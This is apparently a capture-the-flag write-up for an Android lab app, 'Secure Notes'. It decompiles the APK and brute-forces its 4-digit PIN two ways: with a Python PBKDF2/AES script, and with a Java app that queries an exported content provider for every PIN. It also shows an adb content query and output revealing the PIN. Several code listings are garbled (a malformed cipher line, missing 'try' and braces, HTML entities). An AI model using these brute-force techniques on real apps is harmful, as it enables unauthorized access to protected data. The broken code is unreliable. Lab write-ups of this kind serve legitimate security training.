Description: Welcome to the Secure Notes Challenge! This lab immerses you in the intricacies of Android content providers, challenging you to crack a PIN code protected by a content provider within an Android application. It’s an excellent opportunity to explore Android’s data management and security features.

Secure Notes

Install the APK with ADB

					adb install -r secureNotes.apk

We can see that we need insert a 4 digit numbers PIN.
Let’s decompile it with apktool

					apktool d secureNotes.apk

Also, let’s check the source code with jadx.
Notice that the directory that apktool drop us, inside of assets directory, we have the file.
Which have this content:


May be this can be cracked? 😛

					import base64
from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2

# data
encrypted_secret = base64.b64decode("bTjBHijMAVQX+CoyFbDPJXRUSHcTyzGaie3OgVqvK5w=")
salt = base64.b64decode("m2UvPXkvte7fygEeMr0WUg==")
iv = base64.b64decode("L15Je6YfY5owgIckR9R3DQ==")
iteration_count = 10000

# decrypt
def decrypt_secret(password):
        # PBKDF2
        key = PBKDF2(password, salt, dkLen=32, count=iteration_count)

        # AES (CBC)
        cipher =, AES.MODE_CBC, iv)

        # decrypt
        decrypted = cipher.decrypt(encrypted_secret)

        # delete padding (PKCS7)
        pad = decrypted[-1]
        if all(p == pad for p in decrypted[-pad:]):
            return decrypted[:-pad].decode('utf-8')
    except (UnicodeDecodeError, ValueError):
    return None

# brute-force between 0000 and 9999
for i in range(0, 10000):
    password = f"{i:04d}"  # format numbers (eg. 0001, 1234)
    result = decrypt_secret(password)
    if result:
        print(f"[+] PIN: {password}")
        print(f"[+] Secret: {result}")
        print(f"[-] Testing: {password}", end='\r')


					[+] PIN: 2580
[+] Secret: CTF{D1d_********1t!1?}

This is so dirty…. let’s hack as MHL want.

Let’s move to source code.
The package name is com.mobilehackinglab.securenotes.
We have just one activity which is com.mobilehackinglab.securenotes.MainActivity.
Also, is exported.
Notice that we have an Content Provider (Exported & Enabled)


        <action android:name="android.intent.action.MAIN"/>  
        <category android:name="android.intent.category.LAUNCHER"/>  

We can see the code where this provider are implemented. Is an class named SecretDataProvider.
In the onCreate() method we can see the information that we was work with the AES decrypt method.

Useful code is

					if (selection == null || !StringsKt.startsWith$default(selection, "pin=", false, 2, (Object) null)) {
    return null;
String removePrefix = StringsKt.removePrefix(selection, (CharSequence) "pin=");


  • pin= parameter is expected in the query, but no robust validation is performed on the value.
  • An attacker can send common pins or perform a brute force attack directly.
  • There is no mechanism for rate limiting (limit attempts per minute).

Also, we have a respons

					MatrixCursor $this$query_u24lambda_u243_u24lambda_u242 = new MatrixCursor(new String[]{"Secret"});
$this$query_u24lambda_u243_u24lambda_u242.addRow(new String[]{secret});


  • If the pin is correct, the application returns the secret in a response without any additional obfuscation or validation.
  • The attacker receives the decrypted content directly.

But, the main problem is that the provider is exported (as in AndroidManifest.xml can see).
This mean that any app installed on device can make unlimited query.

So, we have the uri:
How we can get this?
Simple, in android manifest or just unzipping the apk file, then, search for strings in the classes.dex files.

					strings classes* | grep content://

We can run this ADB command

					adb shell content query \
    --uri content://com.mobilehackinglab.securenotes.secretprovider \
    --where "pin=2580"

Notice that --where is because we have a provider with selection (mentioned in “useful code”).

We can’t updatedelete or insert PINs because there aren’t implementation if you look the code.
Also, check in the source code that the line

					String format = String.format("%04d", Arrays.copyOf(new Object[]{Integer.valueOf(Integer.parseInt(removePrefix))}, 1));

Clearly said that the PIN is between 0000 – 9999

This query can be bruteforceable.
But, let’s make our own app.
The concept is simple, just make many query until you match with the secret CTF{
You can make a so simple app

					package com.lautaro.insecurenotes;

import android.database.Cursor;
import android.os.Bundle;
import android.util.Log;


public class MainActivity extends AppCompatActivity {

    private static final String TAG = "secretPin";
    private static final String PROVIDER_URI = "content://com.mobilehackinglab.securenotes.secretprovider";

    protected void onCreate(Bundle savedInstanceState) {

        // Init
        new Thread(this::bruteForcePin).start();

    private void bruteForcePin() {
        Uri uri = Uri.parse(PROVIDER_URI);

        for (int i = 0; i < 10000; i++) {
            String pin = String.format("%04d", i);
            String selection = "pin=" + pin;

            try (Cursor cursor = getContentResolver().query(uri, null, selection, null, null)) {
                if (cursor != null &#038;&#038; cursor.moveToFirst()) {
                    String result = cursor.getString(cursor.getColumnIndexOrThrow("Secret"));
                    Log.d(TAG, "Correct PIN!: " + pin + " | Secret: " + result);
            } catch (Exception e) {
                Log.e(TAG, "Error: " + pin, e);

Or use some beautiful like the mine 😉

I hope you found it useful (:

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